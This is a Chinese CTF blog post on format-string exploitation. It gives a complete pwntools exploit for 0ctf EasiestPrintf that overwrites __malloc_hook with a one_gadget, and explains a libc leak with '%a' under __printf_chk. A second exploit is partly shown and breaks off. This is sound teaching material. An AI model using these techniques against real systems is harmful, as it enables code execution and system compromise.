<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,">





  <link rel="alternate" href="/atom.xml" title="R4bb1t的ctf博客" type="application/atom+xml">






<meta name="description" content="1、2017-0ctf-EasiestPrintfcheckseck 12345Arch:     i386-32-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x8048000) got 表不可改">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="printf玩出了新花样">
<meta property="og:url" content="http://yoursite.com/2020/06/21/printf玩出了新花样/index.html">
<meta property="og:site_name" content="R4bb1t的ctf博客">
<meta property="og:description" content="1、2017-0ctf-EasiestPrintfcheckseck 12345Arch:     i386-32-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x8048000) got 表不可改">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2020-03-05T04:20:30.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="printf玩出了新花样">
<meta name="twitter:description" content="1、2017-0ctf-EasiestPrintfcheckseck 12345Arch:     i386-32-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x8048000) got 表不可改">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/06/21/printf玩出了新花样/">





  <title>printf玩出了新花样 | R4bb1t的ctf博客</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">R4bb1t的ctf博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/06/21/printf玩出了新花样/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="R4bb1t">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/n0va.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="R4bb1t的ctf博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">printf玩出了新花样</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-06-21T15:11:22+08:00">
                2020-06-21
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="1、2017-0ctf-EasiestPrintf"><a href="#1、2017-0ctf-EasiestPrintf" class="headerlink" title="1、2017-0ctf-EasiestPrintf"></a>1、2017-0ctf-EasiestPrintf</h2><p>checkseck</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     i386-32-little</span><br><span class="line">RELRO:    Full RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x8048000)</span><br></pre></td></tr></table></figure>
<p>got 表不可改</p>
<a id="more"></a>
<p>程序逻辑很简单，先给你一个真实地址<code>printf(&quot;%#x\n&quot;, *v1);</code>，之后有一次printf(s)格式化字符串的机会，就调用exit退出 ，所以我们需要在这次printf(s)后就控制 EIP</p>
<p>需要注意的是，程序在leave前进行了一次随机抬栈<code>v3 = alloca(16 * ((buf + 30) / 0x10u));</code>所以想直接通过printf控制栈是不太可能的，因为偏移每次都不一样。而且got表不可改，也不存在将exit@got改为main。</p>
<p>这里需要知道一个点，printf 是会调用malloc和free函数的，在它需要输入一串比较长的字符时，需要临时申请空间来存放这些字符，输出后再调用free释放这部分空间。</p>
<p>所以这题的思路就是，将malloc_hook利用printf 修改为onegadget，然后通过<code>%100000c</code>来触发malloc调用onegadget</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./EasiestPrintf5'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./EasiestPrintf5'</span>)</span><br><span class="line">libc = ELF(<span class="string">'/lib/i386-linux-gnu/libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line">one = [<span class="number">0x3ac5c</span>,<span class="number">0x3ac5e</span>,<span class="number">0x3ac62</span>,<span class="number">0x3ac69</span>,<span class="number">0x5fbc5</span>,<span class="number">0x5fbc6</span>]</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"read:\n"</span>,str(elf.got[<span class="string">'read'</span>]))</span><br><span class="line">read_addr = int(p.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>],<span class="number">16</span>)</span><br><span class="line">libc_base = read_addr - libc.symbols[<span class="string">'read'</span>]</span><br><span class="line">malloc_hook = libc_base + libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">malloc = libc_base + libc.symbols[<span class="string">'malloc'</span>]</span><br><span class="line">onegadget = libc_base + one[<span class="number">2</span>]</span><br><span class="line">log.info(<span class="string">"read_addr --&gt; %s"</span>,hex(read_addr))</span><br><span class="line">log.info(<span class="string">"malloc --&gt; %s"</span>,hex(malloc))</span><br><span class="line">pay = fmtstr_payload(<span class="number">7</span>,&#123;malloc_hook:onegadget&#125;)</span><br><span class="line">pay += <span class="string">"%100000c"</span></span><br><span class="line">gdb.attach(p,<span class="string">"b *0x804881C"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Bye\n"</span>,pay)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="2、easy-printf"><a href="#2、easy-printf" class="headerlink" title="2、easy_printf"></a>2、easy_printf</h2><p>这道题来自<a href="http://pwn.eonew.cn/index.php" target="_blank" rel="noopener">星盟pwn平台</a>，出自EX师傅的手，同时欢迎大家来我们的pwn平台刷题，题目质量绝对杠杠的</p>
<p>保护全开，环境是libc2.27,程序两个功能，1、调用printf_chk；2、调用printf且存在格式化字符串漏洞的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">.text:0000000000000ADD                 call    _printf</span><br><span class="line">.text:0000000000000AE2                 mov     edi, 0          ; error_code</span><br><span class="line">.text:0000000000000AE7                 mov     eax, 0E7h</span><br><span class="line">.text:0000000000000AEC                 syscall</span><br></pre></td></tr></table></figure>
<p>可以看到调用完printf用程序也是直接退出了，所以利用方式还是跟0ctf一样通过调用malloc来get shell，但是首先要拿到<code>libc_base</code></p>
<p>回头看printf_chk函数,printf_chk函数可以有效地阻拦格式化字符串的攻击，无法直接使用<code>%x$p</code>，也无法使用<code>%n</code></p>
<h3 id="a-leak-libc"><a href="#a-leak-libc" class="headerlink" title="%a leak libc"></a>%a leak libc</h3><p>以下面代码为例</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;                                  </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;                                 </span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span>                                          </span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%d,%d,%d,%d,%d,%d\n"</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%f,%f,%f,%f,%f,%f\n"</span>,<span class="number">1.0</span>,<span class="number">2.0</span>,<span class="number">3.0</span>,<span class="number">4.0</span>,<span class="number">5.0</span>,<span class="number">6.0</span>);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%d,%f,%d,%f,%d,%f\n"</span>,<span class="number">1</span>,<span class="number">2.0</span>,<span class="number">3</span>,<span class="number">4.0</span>,<span class="number">5</span>,<span class="number">6.0</span>);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%d,%d,%d,%f,%f,%f\n"</span>,<span class="number">1.0</span>,<span class="number">2.0</span>,<span class="number">3.0</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>64位下的<code>__printf_chk</code>编译 <code>gcc -o test -t -O1 test.c</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">► 0x400517 &lt;main&gt;       sub    rsp, 8</span><br><span class="line">  0x40051b &lt;main+4&gt;     push   6</span><br><span class="line">  0x40051d &lt;main+6&gt;     push   5</span><br><span class="line">  0x40051f &lt;main+8&gt;     mov    r9d, 4</span><br><span class="line">  0x400525 &lt;main+14&gt;    mov    r8d, 3</span><br><span class="line">  0x40052b &lt;main+20&gt;    mov    ecx, 2</span><br><span class="line">  0x400530 &lt;main+25&gt;    mov    edx, 1</span><br><span class="line">  0x400535 &lt;main+30&gt;    lea    rsi, [rip + 0x168]</span><br><span class="line">  0x40053c &lt;main+37&gt;    mov    edi, 1</span><br><span class="line">  0x400541 &lt;main+42&gt;    mov    eax, 0</span><br><span class="line">  0x400546 &lt;main+47&gt;    call   __printf_chk@plt &lt;0x400420&gt;</span><br></pre></td></tr></table></figure>
<p>第一句，<code>printf(&quot;%d,%d,%d,%d,%d,%d\n&quot;,1,2,3,4,5,6);</code><br>遵守一般的调用约定,前6个参数通过寄存器<code>rdi</code>、<code>rsi</code>、<code>rdx</code>、<code>rcx</code>、<code>rcx</code>、<code>r8</code>、<code>r9</code>,剩余的参数通过栈传递</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">  0x40054b &lt;main+52&gt;     movsd  xmm5, qword ptr [rip + 0x19d]</span><br><span class="line">  0x400553 &lt;main+60&gt;     movsd  xmm4, qword ptr [rip + 0x19d]</span><br><span class="line">  0x40055b &lt;main+68&gt;     movsd  xmm3, qword ptr [rip + 0x19d]</span><br><span class="line">  0x400563 &lt;main+76&gt;     movsd  xmm2, qword ptr [rip + 0x19d]</span><br><span class="line">  0x40056b &lt;main+84&gt;     movsd  xmm1, qword ptr [rip + 0x19d]</span><br><span class="line">► 0x400573 &lt;main+92&gt;     movsd  xmm0, qword ptr [rip + 0x19d]</span><br><span class="line">  0x40057b &lt;main+100&gt;    lea    rsi, [rip + 0x135]</span><br><span class="line">  0x400582 &lt;main+107&gt;    mov    edi, 1</span><br><span class="line">  0x400587 &lt;main+112&gt;    mov    eax, 6</span><br><span class="line">  0x40058c &lt;main+117&gt;    call   __printf_chk@plt &lt;0x400420&gt;</span><br></pre></td></tr></table></figure>
<p>第二句<code>printf(&quot;%f,%f,%f,%f,%f,%f\n&quot;,1.0,2.0,3.0,4.0,5.0,6.0);</code><br>浮点数通过浮点数寄存器<code>xmm0</code>到<code>xmm7</code>，剩下的参数通过栈来传递</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">  0x400591 &lt;main+122&gt;    movsd  xmm2, qword ptr [rip + 0x157]</span><br><span class="line">  0x400599 &lt;main+130&gt;    mov    r8d, 5</span><br><span class="line">  0x40059f &lt;main+136&gt;    movsd  xmm1, qword ptr [rip + 0x159]</span><br><span class="line">  0x4005a7 &lt;main+144&gt;    mov    ecx, 3</span><br><span class="line">  0x4005ac &lt;main+149&gt;    movsd  xmm0, qword ptr [rip + 0x15c]</span><br><span class="line">► 0x4005b4 &lt;main+157&gt;    mov    edx, 1</span><br><span class="line">  0x4005b9 &lt;main+162&gt;    lea    rsi, [rip + 0x10a]</span><br><span class="line">  0x4005c0 &lt;main+169&gt;    mov    edi, 1</span><br><span class="line">  0x4005c5 &lt;main+174&gt;    mov    eax, 3</span><br><span class="line">  0x4005ca &lt;main+179&gt;    call   __printf_chk@plt &lt;0x400420&gt;</span><br></pre></td></tr></table></figure>
<p>第三句<code>printf(&quot;%d,%f,%d,%f,%d,%f\n&quot;,1,2.0,3,4.0,5,6.0);</code><br>和预想一样,整数存入整数寄存器,浮点数存入浮点数寄存器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">  0x4005cf &lt;main+184&gt;    mov    r8d, 6</span><br><span class="line">  0x4005d5 &lt;main+190&gt;    mov    ecx, 5</span><br><span class="line">  0x4005da &lt;main+195&gt;    mov    edx, 4</span><br><span class="line">  0x4005df &lt;main+200&gt;    movsd  xmm2, qword ptr [rip + 0x121]</span><br><span class="line">  0x4005e7 &lt;main+208&gt;    movsd  xmm1, qword ptr [rip + 0x121]</span><br><span class="line">► 0x4005ef &lt;main+216&gt;    movsd  xmm0, qword ptr [rip + 0x121]</span><br><span class="line">  0x4005f7 &lt;main+224&gt;    lea    rsi, [rip + 0xdf]</span><br><span class="line">  0x4005fe &lt;main+231&gt;    mov    edi, 1</span><br><span class="line">  0x400603 &lt;main+236&gt;    mov    eax, 3</span><br><span class="line">  0x400608 &lt;main+241&gt;    call   __printf_chk@plt &lt;0x400420&gt;</span><br></pre></td></tr></table></figure>
<p>第四句<code>printf(&quot;%d,%d,%d,%f,%f,%f\n&quot;,1.0,2.0,3.0,4,5,6);1</code><br>编译器在编译时会根据格式化字符串的值选择寄存器的类型而不是通过格式化字符串选择</p>
<p>那么，%a leak 的值是哪的呢？</p>
<p>第一句<code>printf(&quot;%d,%d,%d,%d,%d,%d\n&quot;,1,2,3,4,5,6);</code>跟进<code>__printf_chk</code>函数,发现这里进行了堆栈操作，将之前寄存器的值压入栈中，之后一个条件跳转，接下来就是正常的执行流程了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">  0x7ffff7b161e1 &lt;__printf_chk+17&gt;     test   al, al</span><br><span class="line">  0x7ffff7b161e3 &lt;__printf_chk+19&gt;     mov    qword ptr [rsp + 0x30], rdx</span><br><span class="line">  0x7ffff7b161e8 &lt;__printf_chk+24&gt;     mov    qword ptr [rsp + 0x38], rcx</span><br><span class="line">  0x7ffff7b161ed &lt;__printf_chk+29&gt;     mov    qword ptr [rsp + 0x40], r8</span><br><span class="line">  0x7ffff7b161f2 &lt;__printf_chk+34&gt;     mov    qword ptr [rsp + 0x48], r9</span><br><span class="line">► 0x7ffff7b161f7 &lt;__printf_chk+39&gt;   ✔ je     __printf_chk+96 &lt;0x7ffff7b16230&gt;</span><br><span class="line">   ↓</span><br><span class="line">  0x7ffff7b16230 &lt;__printf_chk+96&gt;     mov    rax, qword ptr fs:[0x28]</span><br><span class="line">  0x7ffff7b16239 &lt;__printf_chk+105&gt;    mov    qword ptr [rsp + 0x18], rax</span><br><span class="line">  0x7ffff7b1623e &lt;__printf_chk+110&gt;    xor    eax, eax</span><br><span class="line">  0x7ffff7b16240 &lt;__printf_chk+112&gt;    mov    rbp, qword ptr [rip + 0x2b8cf9]</span><br><span class="line">  0x7ffff7b16247 &lt;__printf_chk+119&gt;    mov    rbx, qword ptr [rbp]</span><br></pre></td></tr></table></figure>
<p>第二句<code>printf(&quot;%f,%f,%f,%f,%f,%f\n&quot;,1.0,2.0,3.0,4.0,5.0,6.0);</code>跟<code>__printf_chk</code>函数，发现这里虽然 没有使用整数寄存器，但是同样将整数寄存器压入栈中，之后 由于未符合条件未发生跳转，接下来将浮点数寄存器压入栈中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">  0x7ffff7b161e1 &lt;__printf_chk+17&gt;    test   al, al</span><br><span class="line">  0x7ffff7b161e3 &lt;__printf_chk+19&gt;    mov    qword ptr [rsp + 0x30], rdx</span><br><span class="line">  0x7ffff7b161e8 &lt;__printf_chk+24&gt;    mov    qword ptr [rsp + 0x38], rcx</span><br><span class="line">  0x7ffff7b161ed &lt;__printf_chk+29&gt;    mov    qword ptr [rsp + 0x40], r8</span><br><span class="line">  0x7ffff7b161f2 &lt;__printf_chk+34&gt;    mov    qword ptr [rsp + 0x48], r9</span><br><span class="line">► 0x7ffff7b161f7 &lt;__printf_chk+39&gt;    je     __printf_chk+96 &lt;0x7ffff7b16230&gt;</span><br><span class="line"></span><br><span class="line">  0x7ffff7b161f9 &lt;__printf_chk+41&gt;    movaps xmmword ptr [rsp + 0x50], xmm0</span><br><span class="line">  0x7ffff7b161fe &lt;__printf_chk+46&gt;    movaps xmmword ptr [rsp + 0x60], xmm1</span><br><span class="line">  0x7ffff7b16203 &lt;__printf_chk+51&gt;    movaps xmmword ptr [rsp + 0x70], xmm2</span><br><span class="line">  0x7ffff7b16208 &lt;__printf_chk+56&gt;    movaps xmmword ptr [rsp + 0x80], xmm3</span><br><span class="line">  0x7ffff7b16210 &lt;__printf_chk+64&gt;    movaps xmmword ptr [rsp + 0x90], xmm4</span><br></pre></td></tr></table></figure>
<p>那么，这个寄存器<code>al</code>是什么呢，在调用<code>__printf_chk</code>之前 会对<code>eax</code>赋值，其值为浮点数的个数，如果没有浮点数，其值为0，<code>0x400587 &lt;main+112&gt;    mov    eax, 6</code></p>
<p>到这里我们可以推测栈的布局如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">+--------------------------+</span><br><span class="line">|          value1          |</span><br><span class="line">+--------------------------+</span><br><span class="line">|          value2          |</span><br><span class="line">+--------------------------+</span><br><span class="line">|            ...           |</span><br><span class="line">+--------------------------+</span><br><span class="line">|       integer arg1       | &lt;= rdx(rsp + 0x30)</span><br><span class="line">+--------------------------+</span><br><span class="line">|       integer arg2       | &lt;= rcx</span><br><span class="line">+--------------------------+</span><br><span class="line">|       integer arg3       | &lt;= r8</span><br><span class="line">+--------------------------+</span><br><span class="line">|       integer arg4       | &lt;= r9</span><br><span class="line">+--------------------------+</span><br><span class="line">|         xmm arg1         | &lt;= xmm0(rsp + 0x50)</span><br><span class="line">+--------------------------+</span><br><span class="line">|            ...           |</span><br><span class="line">+--------------------------+</span><br><span class="line">|         xmm arg7         | &lt;= xmm7</span><br><span class="line">+--------------------------+</span><br><span class="line">|           rbp            |</span><br><span class="line">+--------------------------+</span><br><span class="line">|           ret            |</span><br><span class="line">+--------------------------+</span><br><span class="line">|           arg1           |</span><br><span class="line">+--------------------------+</span><br><span class="line">|            ...           |</span><br><span class="line">+--------------------------+</span><br><span class="line">|           argn           |</span><br><span class="line">+--------------------------+</span><br></pre></td></tr></table></figure>
<p>对于格式化字符串,在栈中有一段<code>shadow space</code>,用于将寄存器中的值压栈,这样有利于<code>va_start (ap, format);</code>的实现</p>
<p><code>shadow space</code>中有一段栈空间用于保存整数型变量,一段栈空间用于保存浮点数类型变量,两者互不影响</p>
<p>在开始的时候会将所有用于传递整数类型的寄存器<code>rdx</code>、<code>rcx</code>、<code>r8</code>、<code>r9</code>压入栈用</p>
<p>之后会判断<code>al</code>的值是否为0,<code>al</code>为参数列表中使用xmm寄存器的个数,当<code>al</code>不为0时,会将所有的浮点数寄存器压入栈中</p>
<p>然后根据<code>va_start (ap, format);</code>读取相应栈上的值</p>
<p>所以，由于程序编译时参数列表并没有值，所以不会将浮点数寄存器压栈，但是在根据<code>va_start(ap,format);</code>读取的时候仍然会从<code>shadow space</code>中对应浮点数部分读取，因此我们leak出的是栈上本就存在的垃圾值</p>
<p>接下来的操作就跟上一题差不多了</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> libformatstr <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"><span class="comment"># p = process('./easy_printf')</span></span><br><span class="line">p = remote(<span class="string">"nc.eonew.cn"</span>,<span class="string">"10010"</span>)</span><br><span 